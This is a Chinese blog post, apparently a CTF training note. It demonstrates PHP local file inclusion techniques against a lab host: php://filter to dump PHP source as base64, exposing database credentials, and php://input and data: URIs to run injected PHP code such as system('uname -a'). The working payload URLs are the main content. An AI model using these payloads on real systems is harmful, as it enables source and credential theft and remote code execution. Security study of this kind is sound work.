注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

那些星星点点的微芒,终会成为燃烧生命的熊熊之光

 
 
 
 
 

日志

 
 

PHP LFI读php文件源码以及直接post webshell  

2013-08-17 15:25:15|  分类: 安全一路走来 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

最近在忙defcon的题目集训 其中有一套题目里 有个老外写的writeup中提到了LFI的另一种小技巧

原文请参考 http://ddxhunter.wordpress.com/2010/03/10/lfis-exploitation-techniques/

PS:该技巧并不是新的技术 神牛肯定已经用得觉得无聊了 所以当路过就行了 =_,=~

我等小菜仅仅当做自己知识的补充~ (默默蹲墙角ing~)

假设如下一个场景

(1) http://vulnerable/fileincl/example1.php?page=intro.php(该php文件包含LFI漏洞)

(2) 但是你没有地方可以upload你的webshell代码

(3) LFI只能读取到非php文件的源码(因为无法解析执行 只能被爆菊花)

(4) 如果你能读取到config.php之类文件 或许可以直接拿到数据库账号远程入侵进去

【现在的问题是】 LFI如何读取到php文件的源码?

于是给大家做个演示 如果我正常用LFI去读/sqli/db.php文件 是无法读取它的源码 它会被当做php文件被执行

http://vulnerable/fileincl/example1.php?page=../sqli/db.php

PHP LFI读php文件源码以及直接post webshell - 墨水 - 墨水

但是如果我用老外文章里说提到的方法 就能把指定php文件的源码以base64方式编码并被显示出来

http://vulnerable/fileincl/example1.php?page=php://filter/read=convert.base64-encode/resource=../sqli/db.phpPHP LFI读php文件源码以及直接post webshell - 墨水 - 墨水

/sqli/db.php源码base64编码后的内容显示如下

PD9waHAgCiAgJGxuayA9IG15c3FsX2Nvbm5lY3QoImxvY2FsaG9zdCIsICJwZW50ZXN0ZXJsYWIiLCAicGVudGVzdGVybGFiIik7CiAgJGRiID0gbXlzcWxfc2VsZWN0X2RiKCdleGVyY2lzZXMnLCAkbG5rKTsKPz4K然后我们再去进行base64解码 解码后/sqli/db.php文件的源码一览无遗

PHP LFI读php文件源码以及直接post webshell - 墨水 - 墨水

看上去好像很厉害的样子…… 但是 =_,=||~ 再继续看下文~

******************* 我是邪恶的分割线 *******************

被 @扣子牛 bs了一番 又学到新的小技巧

【技巧】php://input 和 data:

php://input详情可以参考

http://zerofreak.blogspot.jp/2012/04/lfi-exploitation-via-phpinput-shelling.html

【条件】在allow_url_include = On 且 PHP >= 5.2.0

【优势】直接POST php代码并执行

【鸡肋】在allow_url_include = On 传说中就可以直接RFI了 不过没有vps的童鞋可以这样玩比较方便

在上面提到的同一个LFI漏洞点 我们又要来爆它一次菊花

http://vulnerable/fileincl/example1.php?page=intro.php

访问如下URL并用burp直接修改HTTP包 追加php命令代码

1

http://vulnerable/fileincl/example1.php?page=php://input

PHP LFI读php文件源码以及直接post webshell - 墨水 - 墨水

然后某君再一次被爆菊 >_<!~ (对不起~)

PHP LFI读php文件源码以及直接post webshell - 墨水 - 墨水

再换几种姿势继续  data: 的方式

1

2

3

http://vulnerable/fileincl/example1.php?page=data://text/plain;base64,PD9waHBpbmZvKCk7Lyo=

http://vulnerable/fileincl/example1.php?page=data:;base64,PD9waHBpbmZvKCk7Lyo=

http://vulnerable/fileincl/example1.php?page=data:text/plain,<?php system(“uname -a”);?>

PHP LFI读php文件源码以及直接post webshell - 墨水 - 墨水

剩下的大家再继续YY吧~

由于时间关系 我也木有时间去深入了解其原理

为了Hacker精神建议大家去深入研究下 >_<!~


原文来至:Casperkid


相关扩展:
  评论这张
 
阅读(142)| 评论(0)
推荐

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017